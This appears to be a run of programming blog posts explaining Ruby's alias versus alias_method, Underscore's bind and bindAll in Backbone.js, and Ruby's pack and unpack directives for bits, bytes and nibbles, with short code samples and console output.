It comes up very often. Should I use alias or alias_method . Let’s take a look at them in a bit detail.

Usage of alias

class User

  def full_name
    puts "Johnnie Walker"
  end

  alias name full_name
end

User.new.name #=>Johnnie Walker

Usage of alias_method

class User

  def full_name
    puts "Johnnie Walker"
  end

  alias_method :name, :full_name
end

User.new.name #=>Johnnie Walker

First difference you will notice is that in case of alias_method we need to use a comma between the “new method name” and “old method name”.

alias_method takes both symbols and strings as input. Following code would also work.

alias_method 'name', 'full_name'

That was easy. Now let’s take a look at how scoping impacts usage of alias and alias_method .

Scoping with alias

class User

  def full_name
    puts "Johnnie Walker"
  end

  def self.add_rename
    alias_method :name, :full_name
  end
end

class Developer < User
  def full_name
    puts "Geeky geek"
  end
  add_rename
end

Developer.new.name #=> 'Gekky geek'

In the above case method “name” picks the method “full_name” defined in “Developer” class. Now let’s try with alias.

class User

  def full_name
    puts "Johnnie Walker"
  end

  def self.add_rename
    alias :name :full_name
  end
end

class Developer < User
  def full_name
    puts "Geeky geek"
  end
  add_rename
end

Developer.new.name #=> 'Johnnie Walker'

With the usage of alias the method “name” is not able to pick the method “full_name” defined in Developer.

This is because alias is a keyword and it is lexically scoped. It means it treats self as the value of self at the time the source code was read . In contrast alias_method treats self as the value determined at the run time.

Overall my recommendation would be to use alias_method. Since alias_method is a method defined in class Module it can be overridden later and it offers more flexibility.

Understanding bind and bindAll in Backbone.js

Backbone.js users use bind and bindAll methods provide by underscore.js a lot. In this blog I am going to discuss why these methods are needed and how it all works.

It all starts with apply

Function bindAll internally uses bind . And bind internally uses apply. So it is important to understand what apply does.

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func();

If I execute above code then I get [object window] is beautiful. I am getting that message because when function is invoked then this is window, the default global object.

In order to change the value of this we can make use of method apply as given below.

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func.apply('Internet');

In the above case the alert message will be Internet is beautiful . Similarly following code will produce Beach is beautiful .

var func = function beautiful(){
  alert(this + ' is beautiful');
};
func.apply('Beach'); //Beach is beautiful

In short, apply lets us control the value of this when the function is invoked.

Why bind is needed

In order to understand why bind method is needed first let’s look at following example.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
john.says(); //Ruby rocks!

Above example is pretty straight forward. john is an instance of Developer and when says function is invoked then we get the right alert message.

Notice that when we invoked says we invoked like this john.says(). If we just want to get hold of the function that is returned by says then we need to do john.says. So the above code could be broken down to following code.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = john.says;
func();// undefined rocks!

Above code is similar to the code above it. All we have done is to store the function in a variable called func. If we invoke this function then we should get the alert message we expected. However if we run this code then the alert message will be undefined rocks!.

We are getting undefined rocks! because in this case func is being invoked in the global context. this is pointing to global object called window when the function is executed. And window does not have any attribute called skill . Hence the output of this.skill is undefined.

Earlier we saw that using apply we can fix the problem arising out of this. So lets try to use apply to fix it.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = john.says;
func.apply(john);

Above code fixes our problem. This time the alert message we got was Ruby rocks!. However there is an issue and it is a big one.

In JavaScript world functions are first class citizens. The reason why we create function is so that we can easily pass it around. In the above case we created a function called func. However along with the function func now we need to keep passing john around. That is not a good thing. Secondly the responsibility of rightly invoking this function has been shifted from the function creator to the function consumer. That’s not a good API.

We should try to create functions which can easily be called by the consumers of the function. This is where bind comes in.

How bind solves the problem

First lets see how using bind solves the problem.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
var func = _.bind(john.says, john);
func();// Ruby rocks!

To solve the problem regarding this issue we need a function that is already mapped to john so that we do not need to keep carrying john around. That’s precisely what bind does. It returns a new function and this new function has this bound to the value that we provide.

Here is a snippet of code from bind method

return function() {
  return func.apply(obj, args.concat(slice.call(arguments)));
};

As you can see bind internally uses apply to set this to the second parameter we passed while invoking bind.

Notice that bind does not change existing function. It returns a new function and that new function should be used.

How bindAll solves the problem

Instead of bind we can also use bindAll . Here is solution with bindAll.

function Developer(skill) {
  this.skill = skill;
  this.says = function(){
    alert(this.skill + ' rocks!');
  }
}
var john = new Developer('Ruby');
_.bindAll(john, 'says');
var func = john.says;
func(); //Ruby rocks!

Above code is similar to bind solution but there are some big differences.

The first big difference is that we do not have to worry about the returned value of bindAll . In case of bind we must use the returned function. In bindAll we do not have to worry about the returned value but it comes with a price. bindAll actually mutates the function. What does that mean.

See john object has an attribute called says which returns a function . bindAll goes and changes the attribute says so that when it returns a function, that function is already bound to john.

Here is a snippet of code from bindAll method.

function(f) { obj[f] = _.bind(obj[f], obj); }

Notice that bindAll internally calls bind and it overrides the existing attribute with the function returned by bind.

The other difference between bind and bindAll is that in bind first parameter is a function john.says and the second parameter is the value of this john. In bindAll first parameter is value of this john and the second parameter is not a function but the attribute name.

Things to watch out for

While developing a Backbone.js application someone had code like this

window.ProductView = Backbone.View.extend({
  initialize: function() {
    _.bind(this.render, this);
    this.model.bind('change', this.render);
  }
});

Above code will not work because the returned value of bind is not being used. The correct usage will be

window.ProductView = Backbone.View.extend({
  initialize: function() {
    this.model.bind('change', _.bind(this.render, this));
  }
});

Or you can use bindAll as given below.

window.ProductView = Backbone.View.extend({
  initialize: function() {
    _.bindAll(this, this.render);
    this.model.bind('change', this.render);
  }
});

If you like this blog then most likely you will also like the four videos series on “Understanding this in JavaScript” at Learn JavaScript .

Ruby pack unpack

C programming language allows developers to directly access the memory where variables are stored. Ruby does not allow that. There are times while working in Ruby when you need to access the underlying bits and bytes. Ruby provides two methods pack and unpack for that.

Here is an example.

> 'A'.unpack('b*')
=> ["10000010"]

In the above case ‘A’ is a string which is being stored and using unpack I am trying to read the bit value. The ASCII table says that ASCII value of ‘A’ is 65 and the binary representation of 65 is 10000010 .

Here is another example.

> 'A'.unpack('B*')
=> ["01000001"]

Notice the difference in result from the first case. What’s the difference between b* and B*. In order to understand the difference first lets discuss MSB and LSB.

Most significant bit vs Least significant bit

All bits are not created equal. C has ascii value of 67. The binary value of 67 is 1000011.

First let’s discuss MSB (most significant bit) style . If you are following MSB style then going from left to right (and you always go from left to right) then the most significant bit will come first. Because the most significant bit comes first we can pad an additional zero to the left to make the number of bits eight. After adding an additional zero to the left the binary value looks like 01000011.

If we want to convert this value in the LSB (Least Significant Bit) style then we need to store the least significant bit first going from left to right. Given below is how the bits will be moved if we are converting from MSB to LSB. Note that in the below case position 1 is being referred to the leftmost bit.

move value 1 from position 8 of MSB to position 1 of LSB
move value 1 from position 7 of MSB to position 2 of LSB
move value 0 from position 6 of MSB to position 3 of LSB
and so on and so forth

After the exercise is over the value will look like 11000010.

We did this exercise manually to understand the difference between most significant bit and least significant bit. However unpack method can directly give the result in both MSB and LSB. The unpack method can take both b* and B* as the input. As per the ruby documentation here is the difference.

B | bit string (MSB first)
b | bit string (LSB first)

Now let’s take a look at two examples.

> 'C'.unpack('b*')
=> ["11000010"]

> 'C'.unpack('B*')
=> ["01000011"]

Both b* and B* are looking at the same underlying data. It’s just that they represent the data differently.

Different ways of getting the same data

Let’s say that I want binary value for string hello . Based on the discussion in the last section that should be easy now.

> "hello".unpack('B*')
=> ["0110100001100101011011000110110001101111"]

The same information can also be derived as

> "hello".unpack('C*').map {|e| e.to_s 2}
=> ["1101000", "1100101", "1101100", "1101100", "1101111"]

Let’s break down the previous statement in small steps.

> "hello".unpack('C*')
=> [104, 101, 108, 108, 111]

Directive C* gives the 8-bit unsigned integer value of the character. Note that ascii value of h is 104, ascii value of e is 101 and so on.

Using the technique discussed above I can find hex value of the string.

> "hello".unpack('C*').map {|e| e.to_s 16}
=> ["68", "65", "6c", "6c", "6f"]

Hex value can also be achieved directly.

> "hello".unpack('H*')
=> ["68656c6c6f"]

High nibble first vs Low nibble first

Notice the difference in the below two cases.

> "hello".unpack('H*')
=> ["68656c6c6f"]

> "hello".unpack('h*')
=> ["8656c6c6f6"]

As per ruby documentation for unpack

H | hex string (high nibble first)
h | hex string (low nibble first)

A byte consists of 8 bits. A nibble consists of 4 bits. So a byte has two nibbles. The ascii value of ‘h’ is 104. Hex value of 104 is 68. This 68 is stored in two nibbles. First nibble, meaning 4 bits, contain the value 6 and the second nibble contains the value 8. In general we deal with high nibble first and going from left to right we pick the value 6 and then 8.

However if you are dealing with low nibble first then low nibble value 8 will take the first slot and then 6 will come. Hence the result in “low nibble first” mode will be 86.

This pattern is repeated for each byte. And because of that a hex value of 68 65 6c 6c 6f looks like 86 56 c6 c6 f6 in low nibble first format.

Mix and match directives

In all the previous examples I used *. And a * means to keep going as long as it has to keep going. Lets see a few examples.

A single C will get a single byte.

> "hello".unpack('C')
=> [104]

You can add more Cs if you like.

> "hello".unpack('CC')
=> [104, 101]

> "hello".unpack('CCC')
=> [104, 101, 108]

> "hello".unpack('CCCCC')
=> [104, 101, 108, 108, 111]

Rather than repeating all those directives, I can put a number to denote how many times you want previous directive to be repeated.

> "hello".unpack('C5')
=> [104, 101, 108, 108, 111]

I can use * to capture al the remaining bytes.

> "hello".unpack('C*')
=> [104, 101, 108, 108, 111]

Below is an example where MSB and LSB are being mixed.

> "aa".unpack('b8B8')
=> ["10000110", "01100001"]

pack is reverse of unpack

Method pack is used to read the stored data. Let’s discuss a few examples.

>  [1000001].pack('C')
=> "A"

In the above case the binary value is being interpreted as 8 bit unsigned integer and the result is ‘A’.

> ['A'].pack('H')
=> "\xA0"

In the above case the input ‘A’ is not ASCII ‘A’ but the hex ‘A’. Why is it hex ‘A’. It is hex ‘A’ because the directive ‘H’ is telling pack to treat input value as hex value. Since ‘H’ is high nibble first and since the input has only one nibble then that means the second nibble is zero. So the input changes from ['A'] to ['A0'] .

Since hex value A0 does not translate into anything in the ASCII table the final output is left as it and hence the result is \xA0. The leading \x indicates that the value is hex value.

Notice the in hex notation A is same as a. So in the above example I can replace A with a and the result should not change. Let’s try that.

> ['a'].pack('H')
=> "\xA0"

Let’s discuss another example.

> ['a'].pack('h')
=> "\n"

In the above example notice the change. I changed directive from H to h. Since h means low nibble first and since the input has only one nibble the value of low nibble becomes zero and the input value is treated as high nibble value. That means value changes from ['a'] to ['0a']. And the output will be \x0A. If you look at ASCII table then hex value A is ASCII value 10 which is NL line feed, new line. Hence we see \n as the output because it represents “new line feed”.

Usage of unpack in Rails source code

I did a quick grep in Rails source code and found following usage of unpack.

email_address_obfuscated.unpack('C*')
'mailto:'.unpack('C*')
email_address.unpack('C*')
char.unpack('H2')
column.class.string_to_binary(value).unpack("H*")
data.unpack("m")
s.unpack("U*")

Already we have seen the usage of directive C* and H for unpack. The directive m gives the base64 encoded value and the directive U* gives the UTF-8 character. Here is an example.

> "Hello".unpack('U*')
=> [72, 101, 108, 108, 111]

Testing environment

Above code was tested with ruby 1.9.2 .

French version of this article is available here .